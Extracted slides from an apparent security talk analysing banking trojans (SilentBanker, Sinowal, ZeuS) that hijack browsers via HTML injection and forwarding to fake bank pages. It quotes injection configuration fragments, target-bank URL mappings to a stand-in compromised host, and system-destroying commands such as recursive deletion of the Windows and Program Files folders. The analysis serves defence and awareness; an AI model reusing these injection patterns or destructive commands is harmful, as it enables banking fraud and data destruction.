4. Definition
“Browser hijacking is the modification of a web
browser’s settings by malicious code. The term
‘hijacking’ is used as the changes are performed
without the user’s permission” (Wikipedia)
Additionally, the malicious code can modify the
HTML rendered in the browser in order to lure the
user
4
7. SilentBanker
Date: 2007
Method: Browser Helper Object
Technique: Real time HTML injection and HTML forwarding
Infection: drive-by exploits
Misc: more than 75 mutations
7
12. SilentBanker: Injection Configuration
Get X.Y.67.30/~ipcount/ww6/getcfg.php? Action
pok
id=93D6890E-DC16-4CB7-ABCB-829EB06B1CD7&c=20&v=21&b=6&z=12705442
qas Target URL
njd Begin replacement token
dfr Number of characters in njd -1
xzn End replacement token
[jhw18]
xzq Number of characters in xzn -1
pok=insert
rek HTML code injected
qas=passport.yandex.ru/passport
req Number of characters in rek -1
njd=3ECFE0F0EEEBFC3A3C28
dfr=9
insert insert injected HTML code between tokens
xzn=3C2367653E69
delete delete HTML code in xzn
xzq=5
replace replace HTML code in xzn
rek=202020203C676520696E797674612122676263223E0D0A202020203223ECFE
subreq substitute xzn with rek
BE0F2E5E6EDFBE920EFE0F0EEEBFC3A3C2367713E0D0A202020203C6771206
grab extract field in xzn
A767167752122292431222070796E666621227661636867223E0D0A202020203C
766163686720676C63722122636E66666A6265712220616E7A722122636E66666…
req=331
12
16. Sinowal/Anserin/Torpig
Date: 2005
Method: Code Injection
Technique: Real time HTML injection and HTML forwarding
Infection: drive-by exploits and email
Misc: infects Master Boot Record (MBR) to be stealth
16
17. Sinowal: Injection
Sinowal does not have a configuration file with details about all the injections
Each time the user connects to a specific sites, Sinowal asks its injection
server for instructions
17
18. Sinowal: Injection Example
GET host/Key/EncryptedData
GET host/EFAAC5AEB85FF1D1/
MGJmlWUXX1Rkf8V+6n7wFFFiJsXRwhy1
I want the answer
Tell me the fake This is the targeted encrypted
page path
brand
18
19. Sinowal: Injection Example
Step 3: The injection server looks for the targeted brand:
UK online*.lloydstsb.* /miheld.ibc {www} /uk/lloyds/lloyds.php
204
USA onlineid.bankofamerica.com /cgi-
bin/sso.login.controller* {www}
/usa/bofa_pers/sso.login.php 2 0 3
ES www*.bancopopular.es /Bpemotor {www}
/spain/bancopopular/bancopopular.php 2 0 2
19
20. Sinowal: Injection Example
2: You need a GET of to enabled
5: number
0: Number1: Injection
of visits
This is the fake page injection attempts
the real URL
Step 4: the injection server answers
path
www*.bancopopular.es /Bpemotor
/spain/bancopopular/bancopopular.php 2 0 5 1
20
22. Wnspoem/PRG/ZeuS/Ntos
Date: 2006
Method: Code Injection
Technique: Real time HTML injection and HTML forwarding
Infection: drive-by exploits
Version 1 Version 2 Version 3 Version 4
Directory wnspoem sysproc64 twain_32 lowsec
Filename ntos.exe oembios.exe twext.exe sdra64.exe
Stolen data audio.dll sysproc86.sys local.ds local.ds
Configuratio video.dll sysproc32.sys user.ds user.ds
n
22
29. Wnspoem: HTTP Forwarding
Some banks use security tokens or more complex 2nd authentication than a
password
In this scenario, HTML injection is avoided, and the user is forwarded to a
fake webpage usually hosted in a compromised site
29
30. Wnspoem: HTTP Forwarding
In the configuration file:
@https://*.barclays.co.uk/*
https://*.barclays.co.uk/*
http://compromisedhost.com/img/commons/barclay/index.ph
p
@https://*.cajasur.es/*
https://*.cajasur.es/*
http://compromisedhost.com/img/commons/cajasur/index.ph
p
30
38. Kill the Operating System
It is getting more common that just after stealing the credentials, the operating
system is remotely destroyed
This action makes the analysis more difficult, since cannot be done remotely.
The malicious code is not securely deleted in the system and can be
recovered
One optimistic result is that the machine will be reformated with a new and
patched operating system.
38
39. Kill the Operating System
Nethell:
• Deletes NTDETECT.COM and ntldr
InfoStealer:
• Deletes drivers*.sys
• Deletes some registry keys (HKLMMicrosoftWindows
NTCurrentVersionWinlogon: Shell = Explorer.exe
Wnspoem:
• Deletes HKCU, HKLMSoftware and HKLMSystem
Glacial Dracon:
• del /A:S /Q /F C:*.*
• del /S /Q %SYSTEMROOT% %PROGRAMFILES%
39
41. Summary
Browser Hijacking is actively used in fraud schemes
Targeted brands are all around the world
Currently, only Microsoft Windows users are affected (Internet Explorer and
Firefox)
Be suspicious if your browser is asking for too much information
Be more suspicious if your computer stops working just after your browsing is
asking for too much information ☺
41